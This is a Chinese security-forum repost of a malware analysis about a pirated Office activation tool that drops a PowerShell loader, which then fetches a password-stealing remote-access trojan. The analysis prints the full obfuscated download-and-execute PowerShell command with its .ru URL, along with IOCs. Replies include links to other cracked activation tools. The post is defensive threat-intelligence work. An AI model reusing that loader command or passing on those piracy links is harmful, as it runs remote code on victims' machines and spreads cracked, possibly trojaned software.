吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[转载] 警惕Office盗版激活工具中隐藏的远程控制木马【搬运】

没有星星的夜空 发表于 2019-4-9 08:37
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!

概述
某讯御见威胁情报中心检测到一款Office激活工具被捆绑传播远程控制木马,该Office激活工具实际经过二次打包,黑客将恶意代码和正常的激活程序打包在资源文件中,当用户运行时,除了激活程序会运行,内置的Powershell恶意代码也会运行。该盗版激活工具会在后台下载远程控制木马运行,木马会搜集敏感信息上传并对电脑进行远程控制。

黑客将Powershell脚本代码(lnk文件)和真正的激活工具程序同时藏在资源文件中,生成新的“激活工具”,目标用户运行被重新打包的激活程序时,执行恶意脚本代码的lnk文件被释放运行。

资源文件
资源文件中包含的lnk文件信息

激活工具运行时从资源文件中释放lnk文件:

Lnk文件执行恶意Powershell脚本代码:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $wM=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal t $wM;$nXR=((New-Object Net.WebClient)).DownloadString('http://boundertime.ru/pps.ps1');t $nXR

Lnk指向的代码下载执行Powershell脚本:
hxxp://timebound.ug/pps.ps1(或http://boundertime.ru/pps.ps1)

Powershell脚本运行时,通过FromBase64String解码出PE文件二进制数据,并写入文件C:\Users\Public\xxxx.exe,然后将其作为参数传给Process.start
启动程序

远程控制木马
下载的C:\Users\Public\xxxx.exe为远程控制木马,会搜集浏览器、邮箱、Skype、Telegram、Steam等软件的登录密码上传至C2地址,并接收执行返回的指令,对目标电脑进行远程控制。

发送搜集的数据至C2地址hxxp://ghjgfjhjgf.ru/index.php

安全建议
1、使用正版软件,尽量不要使用激活、破解工具。
2、不要运行来历不明的程序。
3、使用电XX家拦截该类木马攻击。
IOCs

MD5
2fc6dd175a2288a9c2bed36969e3241d
0c638e0c02e0d1c2a2eb7429a51e13b0
a5898f7aae5d6212fac6447bf801ecc1
eb5b534366f0831b3842abac17346cd5
171a6a149d36d8be2f9d4b35c25a8ec4
03a1845d78da4d5d40ffa6cb3892ce0c
ca21c7ae0664b9b5dc24710b0221d4f4
006f03b07fe27eaf4ab4a866a02dc5dd
d343f4179b00f1f3b2ab7b942648b0c2
10e7859d0dfabae2eebc9605e40612f2
05861babd099e81990cfda340de5de01
4e5b4bc27cad9891c1d11ff6ee1b3581
82b313ceef47bf9aa18e3e0946fca773

31.177.78.16

Domain
boundertime.ru
timebound.ug
ghjgfjhjgf.ru

URL
hxxp://timebound.ug/pps.ps1
hxxp://boundertime.ru/pps.ps1
hxxp://ghjgfjhjgf.ru/index.php

动动小手,免费评分走一波

我自己用的这个还可以吧
论坛内也有好多的
链接:https://pan.baidu.com/s/1uncSk4EsUzbputHIIZ5b-w 密码:2mz0
没看版本是啥

论坛里有最新发布的,应该比我的新一点
https://www.52pojie.cn/thread-915743-1-1.html

@迷失自我 我不会点评呀,而且每小时只能发10条,只能在这里说明一下了

有不带木马的激活工具的老铁分享一下,点评取等候。。。  发表于 2019-4-9 08:57

免费评分

liubinzb123 + 1 热心回复!
13697i + 1 热心回复!
kang1314 + 1 + 1 谢谢@Thanks!
清炒藕片丶 + 1 + 1 之前还真下载过英文版的,使用管家就能搞定吗?
Mr.L529042671 + 1 + 1 用心讨论,共获提升!
vb9803 + 1 + 1 我很赞同!
Black-Beauty + 1 + 1 用心讨论,共获提升!
随feng飞扬 + 1 + 1 热心回复!
testonly0531 + 1 谢谢@Thanks!
lhl421 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
fbgnhm110 + 1 + 1 谢谢@Thanks!
AlexAn + 1 我很赞同!
darkbluecs + 1 + 1 谢谢@Thanks!
niugle + 1 我很赞同!
jamiedame + 1 我很赞同!
Mr.Mlwareson_V + 1 + 1 鼓励转贴优秀软件安全工具和文档!
jiang3986633 + 1 + 1 谢谢@Thanks!
ameise + 1 + 1 我很赞同!
灬酱油党 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
泠月酱 + 1 + 1 谢谢@Thanks!
ymd + 1 谢谢@Thanks!
XenProject + 1 + 1 用心讨论,共获提升!
zgcwkj + 1 + 1 鼓励转贴优秀软件安全工具和文档!
52user + 1 + 1 用心讨论,共获提升!
joyu610 + 1 我很赞同!
嗜血天下0 + 1 + 1 我很赞同!
uai1314 + 1 + 1 谢谢@Thanks!
lxq951 + 1 + 1 用心讨论,共获提升!
维系小冉 + 1 学习了,感谢楼主
路人林 + 1 我很赞同!
QDS123 + 1 + 1 希望这个真的是有用的,以前都不管这些,被你这么一说还真的是一抖一抖的,.
河东奇 + 1 + 1 我很赞同!
风扬起时 + 1 + 1 热心回复!
deva- + 1 + 1 谢谢@Thanks!
庄周梦蝶 + 1 + 1 热心回复!
abc302001 + 1 + 1 谢谢@Thanks!
fengbolee + 1 + 1 谢谢@Thanks!
mozart8341 + 1 + 1 我很赞同!
Zome + 1 谢谢@Thanks!
Dishang + 1 + 1 热心回复!
张啊啊 + 1 + 1 谢谢@Thanks!
shyocean + 1 用心讨论,共获提升!
Zxx_ + 1 + 1 热心回复!
hzyh + 1 + 1 我很赞同!
uriel.you + 1 + 1 我很赞同!
南飞-鹿~ + 1 谢谢@Thanks!
十三叔 + 1 + 1 我很赞同!
小心110 + 1 谢谢@Thanks!
清火胶囊 + 1 + 1 用心讨论,共获提升!
浅笑如昔丶 + 1 之前就是论坛里下载了一个,支付宝被远程了2万多。还好有保险赔
游隼89 + 1 + 1 我看不出来。仰望能看出来的/
sylw6919 + 1 + 1 我很赞同!
苏落大神 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
三行而后思 + 1 + 1 我很赞同!
uiui + 1 + 1 谢谢@Thanks!
欧皇非皇 + 1 + 1 我很赞同!
h45673 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
rainxusky + 1 + 1 我很赞同!
zfzzqlx + 1 + 1 热心回复!
sr_bz + 1 + 1 谢谢@Thanks!
jugexigua + 1 谢谢@Thanks!
MichaelWin + 1 热心回复!
顾忌你11 + 1 + 1 谢谢@Thanks!
Yancy-Lan + 1 谢谢@Thanks!
jljyyjd + 1 我很赞同!
exe19890522 + 1 谢谢@Thanks!
月如梭红尘辗 + 1 谢谢@Thanks!
woditian + 1 + 1 谢谢@Thanks!
minglei526 + 1 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
一变万变 + 1 + 1 楼主发这个帖子有什么用?告诉你有病,不给药,还不说怎么看病
dzpos + 1 + 1 热心回复!
路人点心 + 1 + 1 我很赞同!
皓哥阿 + 1 + 1 谢谢@Thanks!
踽踽独行 + 1 + 1 吓得我赶紧查杀电脑
放嗳自由 + 1 + 1 谢谢@Thanks!
夏520 + 1 + 1 以前没注意过,下次谨慎,打击盗版,坚决不买正版
a764329871 + 1 + 1 我很赞同!
ff0510 + 1 + 1 谢谢@Thanks!
rnwxa + 1 + 1 热心回复!
q245198004 + 1 + 1 谢谢@Thanks!
nakasou + 1 + 1 我很赞同!
zhjgood + 1 + 1 谢谢@Thanks!
pushaojie + 1 + 1 热心回复!
pjavac + 1 + 1 我很赞同!
shanfei + 1 + 1 谢谢@Thanks!
zourongfeng + 1 + 1 谢谢@Thanks!
sfoto2011 + 1 + 1 谢谢@Thanks!
zpp7 + 1 + 1 我很赞同!
lxb + 1 + 1 我很赞同!
973143152 + 1 + 1 热心回复!
游侠dede + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
遇日不归 + 1 + 1 我很赞同!
1000Y + 1 + 1 谢谢@Thanks!
寂寞00侃 + 1 鼓励转贴优秀软件安全工具和文档!
cuteftp + 1 + 1 鼓励转贴优秀软件安全工具和文档!
wjzj + 1 + 1 谢谢@Thanks!
練ppg + 1 + 1 热心回复!
Raylist + 1 热心回复!
树泽 + 1 谢谢@Thanks!
xiaokaic + 1 谢谢@Thanks!

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

头像被屏蔽
爱凤凤呦 发表于 2019-4-9 08:41
 楼主| 没有星星的夜空 发表于 2019-4-9 08:44
努力的笨蛋 发表于 2019-4-9 08:41
看你的激活工具来源了

嗯,帖子说明了是盗版激活工具

正版激活工具一般都没有的
hhk007 发表于 2019-4-9 08:41
 楼主| 没有星星的夜空 发表于 2019-4-9 08:48

说不定就是因为某讯工程师用了激活工具竟然被黑,以至于开始搜寻这事了
a2f88 发表于 2019-4-9 08:41
不使用破解工具的概率不大啊
 楼主| 没有星星的夜空 发表于 2019-4-9 09:50
简单i 发表于 2019-4-9 09:48
用什么软件可以查毒呢

某讯安全管家、36o 都可以的

免费评分

简单i + 1 + 1 谢谢 谢谢

爱到发烧 发表于 2019-4-9 08:39
很好的帖子,学习了
努力的笨蛋 发表于 2019-4-9 08:41
看你的激活工具来源了

就是防不胜防啊。有靠谱的来源吗?分享一下呗。  发表于 2019-4-11 18:41
头像被屏蔽
baiqpl0254 发表于 2019-4-9 08:43
201411112020 发表于 2019-4-9 08:44
谢谢分享!
bricher9988 发表于 2019-4-9 08:44
楼主辛苦了,谢谢分享!!!